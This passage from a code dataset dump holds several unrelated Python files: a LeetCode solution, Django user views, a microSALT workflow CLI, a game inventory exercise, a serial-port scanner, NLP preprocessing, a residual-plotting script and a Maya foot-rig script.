main()\n","sub_path":"oblig4/ordtelling.py","file_name":"ordtelling.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"168756680","text":"# sort the words, then keep in the set and check for nextWord[:-1] in the set\r\nclass Solution:\r\n def longestWord(self, words: List[str]) -> str: \r\n words.sort()\r\n res = \"\"\r\n st = set()\r\n st.add(\"\")\r\n \r\n for word in words:\r\n if word[:-1] in st:\r\n st.add(word)\r\n if len(word) > len(res):\r\n res = word\r\n\r\n return res\r\n \r\n# Time: O(sum(w)+N), w is the length of each word in words, N is the length of words.\r\n# Space: O(sum(w))\r\n \r\n \r\n# sorted words: ['a', 'ap', 'app', 'appl', 'apple', 'apply', 'banana'] \r\n\r\n# word: a\r\n# res: a\r\n# set: {'', 'a'}\r\n# ----------\r\n# word: ap\r\n# res: ap\r\n# set: {'', 'a', 'ap'}\r\n# ----------\r\n# word: app\r\n# res: app\r\n# set: {'', 'a', 'app', 'ap'}\r\n# ----------\r\n# word: appl\r\n# res: appl\r\n# set: {'', 'appl', 'app', 'ap', 'a'}\r\n# ----------\r\n# word: apple\r\n# res: apple\r\n# set: {'', 'appl', 'app', 'ap', 'apple', 'a'}\r\n# ----------\r\n# word: apply\r\n# res: apple\r\n# set: {'', 'appl', 'app', 'ap', 'apply', 'apple', 'a'}\r\n# ----------\r\n# word: banana","sub_path":"04 Hash Table/720. Longest Word in Dictionary.py","file_name":"720. Longest Word in Dictionary.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"55283210","text":"from django.shortcuts import render, redirect \nfrom django.contrib import messages\nfrom .forms import UserRegisterForm ,ProfileUpdateForm, UserUpdateForm\n\n\n\n\n\ndef register(request):\n if request.method == \"POST\":\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, f'Account Created Successfully, Please Login')\n return redirect('login')\n else:\n form = UserRegisterForm()\n return render(request,'users/register.html', {\"form\":form})\n\n\ndef profile(request):\n if not request.user.is_authenticated:\n messages.warning(request, f'Please Login to Access this page')\n return redirect('login')\n else:\n if request.method == \"POST\":\n u_form = UserUpdateForm(request.POST,instance =request.user)\n p_form = ProfileUpdateForm(request.POST,request.FILES,instance = request.user.profile)\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n messages.success(request, f'Account Updated')\n return redirect('profile')\n else:\n u_form = UserUpdateForm(instance =request.user)\n p_form = ProfileUpdateForm(instance = request.user.profile)\n\n context = {\n 'u_form':u_form,\n 'p_form':p_form\n }\n return render(request, 'users/profile.html',context)\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"249746099","text":"\"\"\"Add CLI support to start microsalt\"\"\"\n\nimport json\nimport logging\nfrom pathlib import Path\nimport subprocess\n\nimport click\n\nfrom cg.apps import hk, lims\nfrom cg.apps.usalt.fastq import FastqHandler\nfrom cg.cli.workflow.microsalt.store import store as store_cmd\nfrom cg.cli.workflow.microsalt.deliver import (\n deliver as deliver_cmd,\n PROJECT_TAGS,\n SAMPLE_TAGS,\n)\nfrom cg.meta.microsalt.lims import LimsMicrosaltAPI\nfrom cg.meta.workflow.microsalt import AnalysisAPI\nfrom 
cg.meta.deliver import DeliverAPI\nfrom cg.store import Store\n\nLOG = logging.getLogger(__name__)\n\n\n@click.group(\"microsalt\", invoke_without_command=True)\n@click.option(\"-o\", \"--order\", \"order_id\", help=\"include all microbial samples for an order\")\n@click.pass_context\ndef microsalt(context: click.Context, order_id):\n \"\"\"Microbial workflow\"\"\"\n context.obj[\"db\"] = Store(context.obj[\"database\"])\n hk_api = hk.HousekeeperAPI(context.obj)\n lims_api = lims.LimsAPI(context.obj)\n deliver = DeliverAPI(\n context.obj,\n hk_api=hk_api,\n lims_api=lims_api,\n case_tags=PROJECT_TAGS,\n sample_tags=SAMPLE_TAGS,\n )\n context.obj[\"api\"] = AnalysisAPI(db=context.obj[\"db\"], hk_api=hk_api, lims_api=lims_api)\n context.obj[\"lims_microsalt_api\"] = LimsMicrosaltAPI(lims=lims_api)\n\n if context.invoked_subcommand is None:\n if order_id is None:\n LOG.error(\"Please provide an order\")\n context.abort()\n else:\n # execute the analysis!\n context.invoke(config_case, order_id=order_id)\n context.invoke(link, order_id=order_id)\n context.invoke(run, order_id=order_id)\n\n\n@microsalt.command()\n@click.option(\"-o\", \"--order\", \"order_id\", help=\"link all microbial samples for an order\")\n@click.argument(\"sample_id\", required=False)\n@click.pass_context\ndef link(context: click.Context, order_id: str, sample_id: str):\n \"\"\"Link microbial FASTQ files for a SAMPLE_ID\"\"\"\n sample_objs = None\n\n if order_id and (sample_id is None):\n # link all samples in a case\n sample_objs = context.obj[\"db\"].microbial_order(order_id).microbial_samples\n elif sample_id and (order_id is None):\n # link sample in all its families\n sample_objs = [context.obj[\"db\"].microbial_sample(sample_id)]\n elif sample_id and order_id:\n # link only one sample in a case\n sample_objs = [context.obj[\"db\"].microbial_sample(sample_id)]\n\n if not sample_objs:\n LOG.error(\"provide order and/or sample\")\n context.abort()\n\n for sample_obj in sample_objs:\n LOG.info(\"%s: link FASTQ files\", sample_obj.internal_id)\n context.obj[\"api\"].link_sample(\n FastqHandler(context.obj),\n case=sample_obj.microbial_order.internal_id,\n sample=sample_obj.internal_id,\n )\n\n\n@microsalt.command(\"config-case\")\n@click.option(\"-d\", \"--dry\", is_flag=True, help=\"print config-case to console\")\n@click.option(\n \"-o\", \"--order\", \"order_id\", help=\"create config-case all microbial samples for an order\",\n)\n@click.argument(\"sample_id\", required=False)\n@click.pass_context\ndef config_case(context: click.Context, dry, order_id: str, sample_id: str):\n \"\"\" Create a config file on case level for microSALT \"\"\"\n if order_id and (sample_id is None):\n microbial_order_obj = context.obj[\"db\"].microbial_order(order_id)\n if not microbial_order_obj:\n LOG.error(\"Order %s not found\", order_id)\n context.abort()\n sample_objs = microbial_order_obj.microbial_samples\n elif sample_id and (order_id is None):\n sample_obj = context.obj[\"db\"].microbial_sample(sample_id)\n if not sample_obj:\n LOG.error(\"Sample %s not found\", sample_id)\n context.abort()\n sample_objs = [context.obj[\"db\"].microbial_sample(sample_id)]\n elif sample_id and order_id:\n microbial_order_obj = context.obj[\"db\"].microbial_order(order_id)\n if not microbial_order_obj:\n LOG.error(\"Samples %s not found in %s \", sample_id, order_id)\n context.abort()\n sample_objs = [\n sample_obj\n for sample_obj in microbial_order_obj.microbial_samples\n if sample_obj.internal_id == sample_id\n ]\n else:\n LOG.error(\"provide order 
and/or sample\")\n context.abort()\n\n parameters = [\n context.obj[\"lims_microsalt_api\"].get_parameters(sample_obj) for sample_obj in sample_objs\n ]\n\n filename = order_id if order_id else sample_id\n outfilename = Path(context.obj[\"usalt\"][\"queries_path\"]) / filename\n outfilename = outfilename.with_suffix(\".json\")\n if dry:\n print(json.dumps(parameters, indent=4, sort_keys=True))\n else:\n with open(outfilename, \"w\") as outfile:\n json.dump(parameters, outfile, indent=4, sort_keys=True)\n\n\n@microsalt.command()\n@click.option(\"-d\", \"--dry\", is_flag=True, help=\"print command to console\")\n@click.option(\"-c\", \"--config-case\", required=False, help=\"optionally change the config-case\")\n@click.argument(\"order_id\")\n@click.pass_context\ndef run(context, dry, config_case, order_id):\n \"\"\" Start microSALT with an order_id \"\"\"\n microsalt_command = context.obj[\"usalt\"][\"binary_path\"]\n command = [microsalt_command]\n\n config_case_path = config_case\n if not config_case:\n queries_path = Path(context.obj[\"usalt\"][\"queries_path\"])\n config_case_path = queries_path / order_id\n config_case_path = config_case_path.with_suffix(\".json\")\n\n command.extend([\"--parameters\", str(config_case_path)])\n if dry:\n print(\" \".join(command))\n else:\n LOG.info(\"Starting microSALT! '%s'\", \" \".join(command))\n subprocess.run(command, shell=True, check=True)\n\n\nmicrosalt.add_command(config_case)\nmicrosalt.add_command(deliver_cmd)\nmicrosalt.add_command(run)\nmicrosalt.add_command(store_cmd)\n","sub_path":"cg/cli/workflow/microsalt/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"264435829","text":"'''\n Fantasy Game Inventory\n\n You are creating a fantasy video game. The data structure to model the\n player’s inventory will be a dictionary where the keys are string values\n describing the item in the inventory and the value is an integer value detailing how many of that item the player has. 
For example, the dictionary value\n    {'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12} means the\n    player has 1 rope, 6 torches, 42 gold coins, and so on.\n    Write a function named displayInventory() that would take any possible\n    “inventory” and display it like the following:\n\n    Inventory:\n    12 arrow\n    42 gold coin\n    1 rope\n    6 torch\n    1 dagger\n    Total number of items: 62\n\n'''\ninventory = {'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12}\n\n\ndef display_inventory(items):\n    total = 0\n\n    print('Inventory:')\n    for key, value in items.items(): # [('rope', 1), ('gold coin', 42), ('torch', 6), ('dagger', 1), ('arrow', 12)]\n        print(str(value) + ' ' + str(key))\n        total += value\n\n    print('Total number of items: ' + str(total))\n\ndisplay_inventory(inventory)\n\n\n\nimport collections\n\ninv = {'gold coin': 42, 'rope': 1}\ndragon_loot = ['gold coin', 'dagger', 'gold coin', 'gold coin', 'ruby']\n\ndef add_to_inventory(inventory, added_items):\n    collected_items = {}\n\n    for item in added_items:\n        collected_items.setdefault(item, 0)\n        collected_items[item] = collected_items[item] + 1\n\n    item_total = collections.Counter(collected_items)\n    add_inv = collections.Counter(inventory)\n\n    return item_total + add_inv\n\n\nsummed_inventory = add_to_inventory(inv, dragon_loot)\ndisplay_inventory(summed_inventory)\n","sub_path":"ATBSWP-projects/fantasy-game-inventory.py","file_name":"fantasy-game-inventory.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"632099783","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n    lantz-scan\n    ~~~~~~~~~~\n\n    Serial port scanner.\n\n    :copyright: 2012 by Lantz Authors, see AUTHORS for more details.\n    :license: BSD, see LICENSE for more details.\n\"\"\"\n\nimport serial\n\ndef scan(ports=None, verbose=False):\n    \"\"\"Scan for available ports.\n\n    :param ports: an iterable of device names or port numbers.\n                  if None, ports 0 to 9 are tried.\n    :param verbose: print status.\n    :return: yield tuples (port, port string) for each port that opens.\n    \"\"\"\n\n    if not ports:\n        ports = range(10)\n\n    if verbose:\n        _print = print\n    else:\n        def _print(*args, **kwargs):\n            pass\n\n    for port in ports:\n        try:\n            _print('Trying {} ... '.format(port), end='')\n            s = serial.Serial(port)\n            yield port, s.portstr\n            s.close()\n            _print('success (port string: {})'.format(s.portstr))\n        except serial.SerialException:\n            _print('failed!')\n            pass\n\nif __name__=='__main__':\n    import sys\n    import argparse\n\n    parser = argparse.ArgumentParser(description='Tries to open serial ports and print the valid ones.')\n    parser.add_argument('ports', metavar='ports', type=str, nargs='*', default=None,\n                        help='Ports to open. Ranges (e.g. 0-3, meaning 0, 1, 2, 3) are also possible.')\n
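    # e.g. passing \"2 5-7\" on the command line scans ports 2, 5, 6 and 7\n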
    args = parser.parse_args()\n\n    if args.ports:\n        try:\n            ports = set()\n            for port in args.ports:\n                if '-' in port:\n                    fr, to = port.split('-')\n                    ports.update(range(int(fr), int(to)+1))\n                else:\n                    try:\n                        ports.add(int(port))\n                    except ValueError:\n                        ports.add(port)\n        except Exception as e:\n            print('Could not parse input {}: {}'.format(port, e))\n            sys.exit(1)\n    else:\n        ports = list(range(0, 10))\n\n    print(\"Testing ports ...\")\n\n    number = len(tuple(scan(ports, verbose=True)))\n\n    print('{} ports found'.format(number))\n","sub_path":"scripts/lantz-scan.py","file_name":"lantz-scan.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"262988939","text":"\"\"\"preprocess.py: Contains general preprocessing functions for textual data\"\"\"\r\n\r\nimport spacy\r\nfrom gensim.models import Word2Vec as word2vec\r\nimport numpy as np\r\n\r\nnp.random.seed(1234)\r\n\r\n# A dict of some additional special words\r\nX_WORDS = {\"unknown\": \"<unk>\", \"start\": \"<start>\", \"end\": \"<end>\", \"digit\": \"<digit>\"}\r\n\r\n# Loads the spacy model\r\nparser = spacy.load('en_core_web_md')\r\n\r\n\r\ndef tokenizer(sentence):\r\n    \"\"\"\r\n    Tokenizes a sentence using spacy models.\r\n    \r\n    :param sentence: str \r\n    :returns tokens: list\r\n    \"\"\"\r\n    doc = parser(sentence)\r\n    tokens = [word.text for word in doc] # get a list of tokenized tokens\r\n    return tokens\r\n\r\n\r\ndef add_boundary_tags(tokens):\r\n    \"\"\"\r\n    Adds start and end tags to list of tokens\r\n    \r\n    :param tokens: list: list of tokenized words\r\n    :returns list: [<start>, w1, w2...., wn, <end>]\r\n    \"\"\"\r\n    return [X_WORDS[\"start\"]] + tokens + [X_WORDS[\"end\"]]\r\n\r\n\r\ndef preprocess(documents, to_lower=True, boundary_tags=False):\r\n    \"\"\"\r\n    Preprocesses raw text - convert into lowercase and add boundary tags\r\n    \r\n    :param documents: list: of str\r\n    :param to_lower: bool: whether to convert text into lowercase(default=True)\r\n    :param boundary_tags: bool: whether to keep boundary tags or not(start, end)\r\n    :returns processed: list: of list: of str: a list of lists of words\r\n    \"\"\"\r\n    processed = list() \r\n    \r\n    for doc in documents:\r\n        \r\n        # Convert into lowercase if flag is set\r\n        if to_lower:\r\n            doc = doc.lower()\r\n        tokens = tokenizer(doc)\r\n        if boundary_tags:\r\n            tokens = add_boundary_tags(tokens)\r\n        processed.append(tokens)\r\n    \r\n    return processed\r\n\r\n\r\ndef to_indices(documents, to_ix):\r\n    \"\"\"\r\n    Converts documents into a list of indices.\r\n    \r\n    :param documents: list: of list: of str: a list of lists of words\r\n    :param to_ix: dict: a word to index mapping\r\n    :returns indices: list: of list: of int: a list of lists of word indices\r\n    \"\"\" \r\n    indices = list()\r\n    \r\n    for doc in documents:\r\n        tokens = list()\r\n        for word in doc:\r\n            try:\r\n                # Look for the word in dict\r\n                tokens.append(to_ix[word])\r\n            except:\r\n                # If not found then add a special word for unknown\r\n                tokens.append(to_ix[X_WORDS[\"unknown\"]])\r\n        indices.append(tokens)\r\n    \r\n    return indices\r\n\r\n\r\ndef w2v_word_mapping(model_path):\r\n    \"\"\"\r\n    Returns mapping of words to indices and vice-versa.\r\n    In addition to a numpy matrix representation of\r\n    pre-trained word vectors with gensim.\r\n    \r\n    :param model_path: str: Relative path to the pre-trained gensim model \r\n    :returns (word_vectors: np.array: of float: A matrix representation of gensim word vectors,\r\n              index_to_word: list: Index to word mapping,\r\n              word_to_index: dict: Word to Index mapping)\r\n    \"\"\"\r\n    \r\n    # Load Word Vector Model and get a list of vocab\r\n    wv_model = word2vec.load(model_path)\r\n    
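# the vocab iteration order below fixes each word's index\r\n    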
index_to_word = list(wv_model.wv.vocab.keys())\n \n word_vectors = list()\n \n # Populate matrix of word vectors\n for word in index_to_word:\n word_vectors.append(wv_model[word])\n \n # Add a special words(unknow, start, end)\n index_to_word += X_WORDS.values()\n \n # Create a reverse mapping for words\n word_to_index = dict((word, idx) for idx, word in enumerate(index_to_word)) \n \n for word in X_WORDS:\n # A random_vector for special words\n random_vector = np.random.rand(wv_model.vector_size)\n word_vectors.append(random_vector)\n \n return np.array(word_vectors), index_to_word, word_to_index\n\n\ndef data_word_mapping(documents):\n \"\"\"\n Returns unique words in a list of strings\n \n :param documents: list: a list of strings \n :returns (None, index_to_word: list: Index to word mapping,\n word_to_index: dict: Word to Index mapping)\n \"\"\"\n \n # If type of documents is a list of words then join them together\n if type(documents[0]) == list:\n documents = [\" \".join(doc) for doc in documents]\n \n vocab = (\" \".join(documents).split()) + [X_WORDS[\"unknown\"]] # End tags will already be there\n index_to_word = np.unique(vocab)\n word_to_index = dict((word, idx) for idx, word in enumerate(index_to_word))\n \n return None, index_to_word, word_to_index\n\n\ndef get_word_mappings(documents=None, w2v_path=None):\n \"\"\"\n Returns mapping of words to indices and vice-versa.\n If the `w2v_path` is given then this will also return \n a numpy matrix representation of pre-trained word vectors with gensim.\n \n :param documents: list: of str: a list of documents/sentences/paragraphs\n :param w2v_path: str: Relative path for pre-trained gensim model\n \n :returns (word_vectors: np.array: of float: A matrix representation of gensim word vectors,\n index_to_word: list: Index to word mapping,\n word_to_index: dict: Word to Index mapping)\n \"\"\"\n if documents:\n return data_word_mapping(documents)\n elif w2v_path:\n return w2v_word_mapping(w2v_path)\n else:\n print(\"Provide either a list of documents or path to a pre-trained gensim model.\")\n \n \ndef train_test_split(dataset, test_size=0.10):\n \"\"\"\n Splits the dataset into training and test sets.\n Each element of 'dataset' has to be a tuple where\n first index is input for the model and second index contains output.\n \n :param dataset: tuple: of (list, list): a tuple with one input and output sample\n :param test_size: int/float: if a float value is given than that portion of 'dataset'(default=0.10)\n will be made the test size. 
An integer value simply represents the count of test samples (e.g. test_size=0.25 on a 100-sample dataset holds out 25 rows).\r\n    :returns (train_data: tuple: of (list, list), test_data: tuple: of (list, list)) \r\n    \"\"\"\r\n    # Let there be some randomness\r\n    np.random.shuffle(dataset)\r\n    \r\n    # If test_size is float then get number of samples for that proportion\r\n    if type(test_size) == float:\r\n        test_size = int(len(dataset) * test_size)\r\n\r\n    test_data = dataset[:test_size]\r\n    train_data = dataset[test_size:]\r\n    \r\n    return train_data, test_data","sub_path":"projects/Word2Vec/scripts/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"483078363","text":"import numpy as np\r\nimport matplotlib\r\nmatplotlib.use('Qt5Agg')\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.ticker as ticker\r\nimport subprocess # better than os.system()\r\n\r\n# harvest data\r\n\r\n# subdirname = 'fullUpwindIBL_fullUpwindTr'\r\n# subdirname = 'LFIBL_fullUpwindTr'\r\n# subdirname = 'straightManifold_fullUpwind_p0' # good\r\n# subdirname = 'straightManifold_fullUpwind_p1' # good\r\n\r\n# subdirname = 'curvedManifold_fullUpwind_p0_avgTraceNormal'\r\n# subdirname = 'curvedManifold_fullUpwind_p0_sepTraceNormal'\r\n# subdirname = 'curvedManifold_fullUpwind_p0_sepTraceNormal_upstreamNrm' # good\r\nsubdirname = 'curvedManifold_fullUpwind_p1_sepTraceNormal_upstreamNrm' # good\r\n\r\n# order_soln = 0\r\norder_soln = 1\r\n\r\nif order_soln == 0:\r\n    nDOF = 24\r\nelif order_soln == 1:\r\n    nDOF = 36\r\nelse:\r\n    raise AssertionError('not supported!')\r\n\r\nindx_rsd = 33 # index of residual component to be examined\r\n\r\nexponent_array = np.arange(-12, -2, 1)\r\n\r\nxtrrel_plus = np.ndarray(exponent_array.size)\r\nresdat_plus = np.ndarray([xtrrel_plus.size, nDOF])\r\n\r\nxtrrel_minus = np.ndarray(exponent_array.size)\r\nresdat_minus = np.ndarray([xtrrel_minus.size, nDOF])\r\n\r\nresdat_zero = np.genfromtxt('/Users/shunz/Workstation/SANSdevelop/test/sandbox/tmp/%s/' % subdirname\r\n                            + 'rsdInit_forcedTransition_xtr0p7054156_p%d.txt' % order_soln)\r\n\r\nfor j in range(exponent_array.size):\r\n    exponent = exponent_array[j]\r\n\r\n    filename = '/Users/shunz/Workstation/SANSdevelop/test/sandbox/tmp/%s/' % subdirname + \\\r\n               'rsdInit_forcedTransition_xtr0p7054156m1em%d_p%d.txt' % (abs(exponent), order_soln)\r\n    xtrrel_minus[j] = -pow(10.0, exponent)\r\n    resdat_minus[j, :] = np.genfromtxt(filename)\r\n\r\n    filename = '/Users/shunz/Workstation/SANSdevelop/test/sandbox/tmp/%s/' % subdirname + \\\r\n               'rsdInit_forcedTransition_xtr0p7054156p1em%d_p%d.txt' % (abs(exponent), order_soln)\r\n    xtrrel_plus[j] = +pow(10.0, exponent)\r\n    resdat_plus[j, :] = np.genfromtxt(filename)\r\n\r\n# examine residual\r\n\r\n# print residual\r\nprint(\"resdat_minus: \", resdat_minus[:, indx_rsd])\r\nprint(\"resdat_zero : \", resdat_zero[indx_rsd])\r\nprint(\"resdat_plus : \", resdat_plus[:, indx_rsd])\r\n\r\n# plot residual\r\n\r\nplt.rc('text', usetex=True)\r\nplt.rc('font', family='Times New Roman')\r\n# plt.rcParams[\"figure.figsize\"] = [16, 9]\r\n\r\nplt.figure(1, figsize=[12, 7])\r\n\r\nax1 = plt.subplot(2, 2, 1)\r\ncp = plt.plot(xtrrel_minus, resdat_minus[:, indx_rsd], 'b+-')\r\nplt.plot(0.0, resdat_zero[indx_rsd], 'ro-')\r\nplt.plot(xtrrel_minus, np.zeros(exponent_array.size), 'k--')\r\nplt.xscale('symlog', linthreshx=1e-12)\r\nplt.yscale('symlog', linthreshy=1e-17)\r\n\r\nplt.title('Residual \\\\#%d' % indx_rsd)\r\nplt.xlabel(r'$x_\\\\textrm{tr} - x_\\\\textrm{interface}$')\r\nplt.ylabel('Residual')\r\n\r\n# ax = plt.gca()\r\nax1.yaxis.set_major_locator(ticker.SymmetricalLogLocator(base=10, linthresh=np.min(np.abs(resdat_minus[:, 
indx_rsd]))))\nax1.yaxis.set_major_formatter(ticker.LogFormatterSciNotation(base=10))\n\nplt.subplot(2, 2, 3, sharex=ax1)\ncp = plt.plot(xtrrel_minus, np.abs(resdat_minus[:, indx_rsd]), 'b+-')\nplt.plot(0.0, abs(resdat_zero[indx_rsd]), 'ro-')\nplt.xscale('symlog', linthreshx=1e-12)\nplt.yscale('log')\n\nplt.title('Residual \\#%d' % indx_rsd)\nplt.xlabel(r'$x_\\textrm{tr} - x_\\textrm{interface}$')\nplt.ylabel('Residual Magnitude')\n\n# plt.axis('equal')\nplt.tight_layout()\n\n# plt.figure(2)\n\nax2 = plt.subplot(2, 2, 2)\nplt.plot(xtrrel_plus, resdat_plus[:, indx_rsd], 'b+-')\n\nif False: # only available in LFIBL_fullUpwindTr for index = 24\n subs_finer_array = np.linspace(1, 10, 10, endpoint=True, dtype=float)\n xtrrel_plus_finer = np.ndarray(subs_finer_array.size)\n resdat_plus_finer = np.ndarray([xtrrel_plus_finer.size, nDOF])\n\n for j in range(subs_finer_array.size):\n subs = subs_finer_array[j]\n filename = '/Users/shunz/Workstation/SANSdevelop/test/sandbox/tmp/%s/' % subdirname + \\\n 'rsdInit_forcedTransition_xtr0p7054156p%dem7.txt' % int(subs)\n xtrrel_plus_finer[j] = subs*1e-7\n resdat_plus_finer[j, :] = np.genfromtxt(filename)\n\n print(\"resdat_plus_finer : \", resdat_plus_finer[:, indx_rsd])\n\n plt.plot(xtrrel_plus_finer, resdat_plus_finer[:, indx_rsd], 'bx-')\n\nplt.plot(0.0, resdat_zero[indx_rsd], 'ro-')\nplt.plot(xtrrel_plus, np.zeros(exponent_array.size), 'k--')\nplt.xscale('symlog', linthreshx=1e-12)\nplt.yscale('symlog', linthreshy=1e-17)\n\nplt.title('Residual \\#%d' % indx_rsd)\nplt.xlabel(r'$x_\\textrm{tr} - x_\\textrm{interface}$')\nplt.ylabel('Residual')\n\nax2.yaxis.set_major_locator(ticker.SymmetricalLogLocator(base=10, linthresh=np.min(np.abs(resdat_plus[:, indx_rsd]))))\nax2.yaxis.set_major_formatter(ticker.LogFormatterSciNotation(base=10))\n\nplt.subplot(2, 2, 4, sharex=ax2)\nplt.plot(xtrrel_plus, np.abs(resdat_plus[:, indx_rsd]), 'b+-')\nplt.plot(0.0, abs(resdat_zero[indx_rsd]), 'ro-')\nplt.xscale('symlog', linthreshx=1e-12)\nplt.yscale('log')\n\nplt.title('Residual \\#%d' % indx_rsd)\nplt.xlabel(r'$x_\\textrm{tr} - x_\\textrm{interface}$')\nplt.ylabel('Residual Magnitude')\n\n# plt.axis('equal')\nplt.tight_layout()\n\nplt.show()\n\n# plt.gcf().set_size_inches(w=14, h=7)\n\nif True:\n filenamefig = 'residualVariation_rsd%d.eps' % indx_rsd\n plt.gcf().savefig(filenamefig, format='eps')\n\n # os.system(\"epstopdf %s\" % filenamefig)\n subprocess.call([\"epstopdf\", filenamefig])\n subprocess.call([\"rm\", filenamefig])\n","sub_path":"cutcellResidualSmoothnessCheck.py","file_name":"cutcellResidualSmoothnessCheck.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"397913986","text":"\"\"\"\n # FKIK fingers\n rig.fingerFKIKSetup(fingerNames=[\"Index\", \"Middle\", \"Ring\", \"Pinky\", \"Thumb\"], sides=[\"L\", \"R\"])\n\n # Rig control modifications\n modify.masterControl(controlScale=1.0)\n modify.bodyControl(controlScale=1.0)\n modify.cogControl(controlScale=1.0)\n modify.hipSwinger(controlScale=1.0)\n modify.fkikControls(controlScale=1.0)\n modify.curveControlColors()\n\n\n # FOOT MOD\n# IK Foot Modification - Use attributes to control foot pivots instead of controls\nfoot_ctl = 'lf_leg_ik_ctl'\n\n# Add attrs\nfoot_attrs = [ 'footTilt', 'heelBall', 'heelBallAngle', 'toesUpDn', 'ballSwivel', 'heelSwivel', ]\n\nfor foot_attr in foot_attrs:\n cmds.addAttr(foot_ctl, ln=foot_attr, dv=0, at='double')\n cmds.setAttr('{}.{}'.format(foot_ctl, foot_attr), k=True, 
l=False)\n\ncmds.setAttr('{}.heelBallAngle'.format(foot_ctl), 25)\n\n# Connect foot attrs\ncmds.connectAttr( '{}.footTilt'.format(foot_ctl), '{}.rock'.format(foot_ctl) )\ncmds.connectAttr( '{}.heelBall'.format(foot_ctl), '{}.roll'.format(foot_ctl) )\ncmds.connectAttr( '{}.heelBallAngle'.format(foot_ctl), '{}.rollAngle'.format(foot_ctl) )\ncmds.connectAttr( '{}.toesUpDn'.format(foot_ctl), 'lf_toes_ik_ctl.rx'.format(foot_ctl) )\n#cmds.connectAttr( '{}.ballSwivel'.format(foot_ctl), '{}.roll'.format(foot_ctl) )\ncmds.connectAttr( '{}.heelSwivel'.format(foot_ctl), 'lf_heelSwing_ctl.ry'.format(foot_ctl) )\n\n# Hide existing attrs\nfoot_attrs_hide = ['swivel', 'roll', 'rollAngle', 'rock']\nfor foot_attr_hide in foot_attrs_hide:\n cmds.setAttr('{}.{}'.format(foot_ctl, foot_attr_hide), k=False, l=False)\n\n# Hide existing controls\ncmds.hide('lf_IKOffsettoes', 'lf_heelSwing_ctl', 'lf_rollHeel_ctlShape')\n\n\nFootTilt = Existing \"Rock\" attr\nHeelBall = Existing \"Roll\" attr\nToesUpDn = 'lf_toes_ik_ctl.rx'\nBallSwivel =\nHeelSwivel = Existing \"Swivel\" attr\nToeCtl = lf_rolltoesEnd_ctl\n\n\"\"\"\n\nimport os\nimport json\n\nimport maya.cmds as cmds\nimport maya.mel as mel\n\nimport py_tasker.tasks\nimport dragonfly.modules\nreload(dragonfly.modules)\n\nLOG = py_tasker.tasks.get_task_logger(__name__)\nMAYA_VER = int(mel.eval('getApplicationVersionAsFloat'))\nCONTROLS_DIRECTORY = os.path.join(os.path.dirname(__file__), 'controls')\n\n\ndef run(params, rig):\n\n for footIK in params['footIKControls']:\n\n footIK_ctl = footIK['footIKControl']\n\n LOG.info('Modifying footIK pivot controls on {}'.format(footIK_ctl))\n\n # Get controls\n toe_ctl = return_foot_node(footIK_ctl, search_str='IKToes_')\n\n # Add attr separator\n attributeSeparator(footIK_ctl, \"FootPivots\")\n\n # Add new foot attrs\n foot_attrs = ['footTilt', 'heelBall', 'heelBallAngle', 'toesUpDn', 'ballSwivel', 'heelSwivel', ]\n\n for foot_attr in foot_attrs:\n cmds.addAttr(footIK_ctl, ln=foot_attr, dv=0, at='double')\n cmds.setAttr('{}.{}'.format(footIK_ctl, foot_attr), k=True, l=False)\n\n cmds.setAttr('{}.heelBallAngle'.format(footIK_ctl), 25)\n\n # Connect new foot attrs to existing foot attrs\n cmds.connectAttr('{}.footTilt'.format(footIK_ctl), '{}.rock'.format(footIK_ctl))\n cmds.connectAttr('{}.heelBall'.format(footIK_ctl), '{}.roll'.format(footIK_ctl))\n cmds.connectAttr('{}.heelBallAngle'.format(footIK_ctl), '{}.rollAngle'.format(footIK_ctl))\n if toe_ctl:\n cmds.connectAttr('{}.toesUpDn'.format(footIK_ctl), '{}.rx'.format(toe_ctl))\n ball_pivot = add_ball_pivot_node(footIK_ctl)\n cmds.connectAttr( '{}.ballSwivel'.format(footIK_ctl), '{}.ry'.format(ball_pivot) )\n heel_pivot = add_heel_pivot_node(footIK_ctl)\n cmds.connectAttr('{}.heelSwivel'.format(footIK_ctl), '{}.ry'.format(heel_pivot))\n\n\n # Hide existing attrs\n foot_attrs_hide = ['swivel', 'roll', 'rollAngle', 'rock']\n for foot_attr_hide in foot_attrs_hide:\n cmds.setAttr('{}.{}'.format(footIK_ctl, foot_attr_hide), k=False, l=False)\n\n # Hide existing controls\n ctls_to_hide = cmds.listRelatives(footIK_ctl, ad=True, type='nurbsCurve')\n\n if 'Front' in footIK_ctl:\n hide_strings = ['IKFrontPaw', 'IKOffsetFrontPaw', 'RollfrontHeel', 'RollToe', 'HeelSwing', 'RollPaws']\n elif 'Back' in footIK_ctl:\n hide_strings = ['IKBackPaw', 'IKOffsetBackPaw', 'RollbackHeel', 'RollToe', 'HeelSwing', 'RollPaw']\n else:\n hide_strings = ['IKToes', 'IKOffsettoes', 'RollHeel', 'RollToes', 'HeelSwing']\n\n for ctl in ctls_to_hide:\n for hide_str in hide_strings:\n if hide_str in 